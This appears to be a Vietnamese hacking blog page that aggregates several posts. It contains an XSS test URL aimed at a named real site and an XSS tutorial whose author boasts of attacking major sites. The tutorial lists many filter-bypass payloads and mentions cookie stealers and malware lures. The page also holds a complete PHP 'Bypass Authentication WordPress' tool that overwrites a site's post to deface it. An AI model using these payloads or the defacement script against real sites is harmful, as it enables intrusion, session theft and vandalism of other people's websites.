http://www.irma-grenoble.com/05documentatio/04dossiers_questions.php?id_DT=%3Cscript%3Ealert%28/Do%20u%20want%20to%20get%20cookie/%29%3C/script%3E
 Chúc các bạn vui vẻ!!!!

Nguồn Tài Liệu
http://junookyo.blogspot.com/2011/12/xss-bai-3-thuc-hanh-voi-xss-wargame.html
Xem chi tiết »
[Tutorial] XSS Bài 1: Basic XSS

[Tutorial] XSS Bài 1: Basic XSS


 Xin Chào và cám ơn đã đọc bài hướng dẫn về XSS này của tôi. Bản có thể hỏi là tại sao tôi lại viết bài hướng dẫn này. Hộp thư của tôi đã quá đầy, và thực sự tôi đã nhận được rất nhiều yêu cầu về việc viết 1 bài hướng dẫn. Tôi đã gửi những cuộc tấn công XSS của tôi trên GG, FB, Defense.gov những site lớn khác. 
XSS là gì. 
Xss được viết tắt bởi Cross-Site-Scripting. Nó là một cách tấn công cơ bản. Và nó dựa trên việc chạy HTML và Javascript trên 1 trang web. Việc tấn công này có thể done khi xác nhận những lệnh ở các text-box, hoặc cũng có thể là trên thanh URL. Những kết quả được đọc dưới dạng HTML, vì vậy nó sử dụng một vài thủ thuật social-engineering (kỹ thuật lừa đảo - scam! 1 ví dụ như những trang face yahoo là 1 trong những kỹ thuật SE) để tác động đến 1 ai đó tải một virus mà chính bạn đã tạo ra, và là tiềm năng cho một botnet, hoặc RAT, cũng có thể là 1 keylogger. XSS có thể trở nên rất nguy hiểm, Nhưng cũng có thể rất vô hại. Phần lớn các cuộc tất công của tôi là 1 cuộc tấn công XSS vô hại. trên đây là 1 số cách để sử dụng XSS để nâng cao trình độ của bạn. Tôi sẽ đi qua một số nhỏ những ví dụ. Bạn có thể sử dụng hộp cảnh báo để quảng bá chính bạn (LOL), hoặc cảnh báo người quản trị website mà bạn phát hiện ra một vi phạm an ninh bởi XSS. Bạn cũng có thể cài đặt 1 Cookie Stealer/Logger. Bất cứ những gì bạn có thể làm với HTML, Đều được sử dụng lại nhiều lần với 1trang bởi XSS. Tôi sẽ giải thích một số trong hầu hết những điều quan trọng liên quan đến XSS
HTML và Javascript là gì?
HTML
HTML là một loại giống như một ngôn ngữ lập trình. Phân biệt giữa các ngôn ngữ lập trình và HTML thì thực ra là nó không quá khác nhau. Chúng là những ngôn ngữ, Đều có thể tạo ra các thuộc tính, sự kiện. HTML là một ngôn ngữ đánh dấu, Mà được sử dụng để tạo ra các website. HTML được viết tắt từ HYPER - TEXT MARKUP LANGUAGE. Bạn có thể sử dụng HTML để tạo ra các FORMS ( Các ô điền! EX: Ô Username, password), Các Buttons (Ex: Nút đăng ký, xác nhận) và những thứ khác mà có thể sử dụng trong trình duyệt web. Trang web nào cũng sử dụng HTML. Nên bạn yên tâm. Bài viết này không thừa
JavaScript
Bây giờ, Đầu tiên, Nói thẳng luôn. Có một sự khác nhau to lớn giữa java và javascript. Java, là một ngôn ngữ tương tự C++, Nó có thể sự dụng trong các game, Còn trong các ứng dụng Javasript là một loại tương tự như HTML, Nhưng có một vài cách định nghĩa khác. Javascript không được sử dụng gần với web hơn HTML. Javascript được sử dụng nhiều hơn với các ứng dụng nằm ngoài trang web. Javascript có thể vô cùng hữ dụng cùng với HTML. Chúng là những điều đơn giản để học, và rất năng động
XSS: Cuộc tấn công đầu tiên của tôi
Nào, hãy bắt đầu lấy những thứ hữu dụng, trong phần này, Tôi sẽ giới thiệu làm cách nào để sử dụng XSS để nâng cao trình độ của bạn. Chúng ta cũng sẽ xem những cuộc tấn công đầu tiên với XSS, Nếu bạn biết căn bản về XSS bạn có thể bỏ qua phần này, bởi vì tôi nghi ngờ bạn sẽ học bất cứ thứ gì mà bạn chưa biết 
Bây giờ, Bước đầu tiên của chúng ta là cố gắng tìm ra một website có lỗi. Tìm một website có lỗi về XSS là một điều dễ dàng hơn việc tìm một website có lỗi SQLi. Với SQLI, bạn có thể thêm '. Nhưng với XSS bạn phải xác nhận (thi thoảng) nhiều lệnh. Để kiểm tra website của bạn với XSS
Hầu hết các site lỗi đều chứa những khu vực như Search(tìm kiếm), Login (Đăng nhập) hoặc Register (Đăng ký). Tuyệt vời hơn là bất cứ nơi nào mà chứa textbox, có thể khai thác với XSS. Tuy nhiên một số người quên điều thực tế này, và không bao giờ sử dụng chúng một cách hiệu quả bởi vì họ nghĩ chúng không hữu dụng. Bạn có thể khai thác XSS thông qua source cũng được. Tôi sẽ giới thiệu phương thức này của XSS sau, còn bây giờ chúng ta cần một 1 ví dụ hoàn toàn cơ bản.
Bằng bất cứ cách nào, website của ta cũng có Texboxes để nhập. Tôi đơn giản sử dụng một thanh Search
Vì vậy, hãy cố gắng tập trung. Lệnh cơ bản xuyên suốt quá trình về XSS

<script>alert("XSS")</script>
Đó là 1 ví dụ nhỏ, là HTML. Nó sẽ làm cho một ít thông báo bật lên,thông báo: "XSS". Bạn có thể chỉnh sửa một phần nếu bạn muốn. Chỉ cần không sửa đổi bất kỳ các bộ phận khác của kịch bản. Đặt vào thanh tìm kiếm của bạn, và nhấn Enter. Bây giờ, nếu một hộp cảnh báo ít xuất hiện, bạn đã thành công tấn công một trang web dễ bị tổn thương XSS! Nếu không có hộp xuất hiện, trang đó an toàn với mã trên của chúng ta, bởi vì có nghĩa là trang web đã thực hiện đưa request vào một bộ lọc. Một bộ lọc, là khi chúng ta tìm kiếm một cái gì đó, sau đó nó đi qua một quá trình nhỏ, về tìm kiếm cơ bản. Nó kiểm tra đối với bất kỳ những thứ độc hại (nguy hiểm). Trong trường hợp này, nó đã tìm được XSS. Đôi khi, các bộ lọc này rất yếu, và có thể được thông qua rất dễ dàng, thời gian khác, họ có thể khá khó khăn để vượt qua. Có rất nhiều cách để bỏ qua một bộ lọc XSS. Trước tiên, chúng ta phải tìm ra những gì các bộ lọc chặn. Nó là blockin cảnh báo. Dưới đây là một ví dụ về loại này của bộ lọc:
<script>alert("XSS")</script>
 Được chuyển thành
<script>alert( > XSS DETECTED < )</script>
Nó sẽ ngăn chặn các dấu ngoặc kép. Vì vậy, làm thế b` nào để chúng ta thông qua? Vâng, may mắn có một cách để mã hóa thông điệp đầy đủ. Chúng ta sẽ sử dụng một chức năng nhỏ được gọi là "String.FromCharCode". Tên của nó đã giải thích tất cả. Nó mã hóa văn bản của chúng ta, thành ASCII. Một ví dụ về mã hóa này, sẽ được như thế này:
String.fromCharCode(88,83,83)
Có, nó có thể được một chút rắc rối nhỏ, nhưng với một chút giải thích, và thử nghiệm, nó là khá đơn giản. Đây là những gì truy vấn đầy đủ của chúng ta sẽ xem xét như:
<script>alert(String.fromCharCode(88,83,83))</script>
Bạn không cần bất kỳ dấu ngoặc kép trong các truy vấn đơn giản như thế. Vì vậy, cho phép đưa nó trở lại vào thanh tìm kiếm, và thì đấy!Nó làm việc! Chúng ta có một hộp cảnh báo nói rằng "XSS"! Nếu bạn vẫn không nhận được bất kỳ hộp cảnh báo, hãy thử một số các truy vấn này mà tôi muốn sử dụng:
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83)) </script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83)) </ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83) )</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,8 3))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83 ,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))
 Vâng, tôi chỉ viết tất cả ,nó là những cách bypass bộ lọc. nhưng tất cả chúng đều làm việc theo cách riêng của chúng, vì vậy hãy thử hết trong số chúng nếu bạn có thể. Tôi đã tấn công một số trang web khá lớn với một số những truy vấn. Tôi tạo ra các truy vấn riêng của tôi đôi khi, bạn nên tạo ra một số, chúng chứa rất nhiều tiện dụng.
Nguồn Tài Liệu
http://junookyo.blogspot.com/2011/12/xss-bai-1-basic-xss.html
Xem chi tiết »

7 thg 8, 2012

Bypass Authentication WordPress

Bypass Authentication WordPress



<html>
<head>
<title>Bypass AuthenticatioN Wordpress By DR.THMOORY</title>
<style>
textarea {
background-color:#ffffff;
border:#445588 solid 1px;
}
textarea.bright {
background-color:#ccccff;
border:#445588 solid 1px;
}
textarea.bright1 {
background-color:#ccccff;
border:#445588 solid 1px;
}
/**
* CSS3 thumbnail inspired by Gloria Langreo
*/

body { padding: 5em 0; text-align: center; background: url(http://cl.ly/EXdC/darkdenim.png) }
a, span { position: relative; display: inline-block; }
img { display: block; }
span { overflow: hidden;
-webkit-box-shadow: 0 2px 8px rgba(0,0,0,1);
-moz-box-shadow: 0 2px 8px rgba(0,0,0,1);
box-shadow: 0 2px 8px rgba(0,0,0,1); }
span:before {
content: "";
position: absolute;
z-index: 2;
top: 0;
bottom: 0;
right: 0;
left: 0;
border: 1px solid rgba(255,255,255,.25);
}
span:after {
content: "";
position: absolute;
z-index: 1;
top: -40%;
left: 0;
width: 500%;
height: 400%;
-webkit-border-radius: 100%;
-moz-border-radius: 100%;
border-radius: 100%;
background: transparent;
-webkit-box-shadow: 0 0 0 200px rgba(255,255,255,.15);
-moz-box-shadow: 0 0 0 200px rgba(255,255,255,.15);
box-shadow: 0 0 0 200px rgba(255,255,255,.15);
border: 1px solid rgba(255,255,255,.2);
transition: all .3s;
}
span:hover:before { border-color: rgba(255,255,255,.3) }
span:hover:after {
-webkit-box-shadow: 0 0 0 200px rgba(255,255,255,.2);
-moz-box-shadow: 0 0 0 200px rgba(255,255,255,.2);
box-shadow: 0 0 0 200px rgba(255,255,255,.2);
background: rgba(255,255,255,.05);
}
*{ font-family:tahoma; font-size:12; } td,tr{ text-align:center;color:#fff;}
</style>
</head>
<body>
<center>
<font color="#fff">Bypass AuthenticatioN In Wordpress-Wp-admin</font><br />
<a href="javascript:void(0);"><span><img src="http://www.swalif.net/swalifsite/wp-content/uploads/2011/04/best-must-have-wordpress-plugins.jpg"></span></a> <br /><br /><br /><br />
<table>
<form method="POST" action=" ">
<tr><td>LocalHost:</td><td><input type="text" name="host" value="localhost"/></td><td><br />
<tr><td>Db : </td><td><input type="text" name="db" /></td><td><br />
<tr><td>UserName : </td><td><input type="text" name="username" /></td><td><br />
<tr><td>PassWord-Db :</td><td><input type="password" name="pass" /></td><td><br />
</table>
<textarea rows="5" cols="50" name="box">Set Your Index !</textarea><br />
<input type="submit" value="Set Index!" /> <br />
</form>
<?
$h0st = $_POST['host'];
$us0r = $_POST['username'];
$p0ss = $_POST['pass'];
$dbxx = $_POST['db'];
$boox = $_POST['box'];
@mysql_connect("$h0st","$us0r","$p0ss");
@mysql_select_db("$dbxx");
$sql = @mysql_query("UPDATE wp_posts SET `post_content` = '".$boox."' WHERE wp_posts.`ID` =1 LIMIT 1 ;");
if ("$sql"){
echo "<font color='#fff'>Done !!</font>";
}

?>
</center>
</body>
</html>
Xem chi tiết »
no image

Căn bản về XSS ( Cross site scripting)

Bản tóm tắt này không có sẵn. Vui lòng nhấp vào đây để xem bài đăng. Xem chi tiết »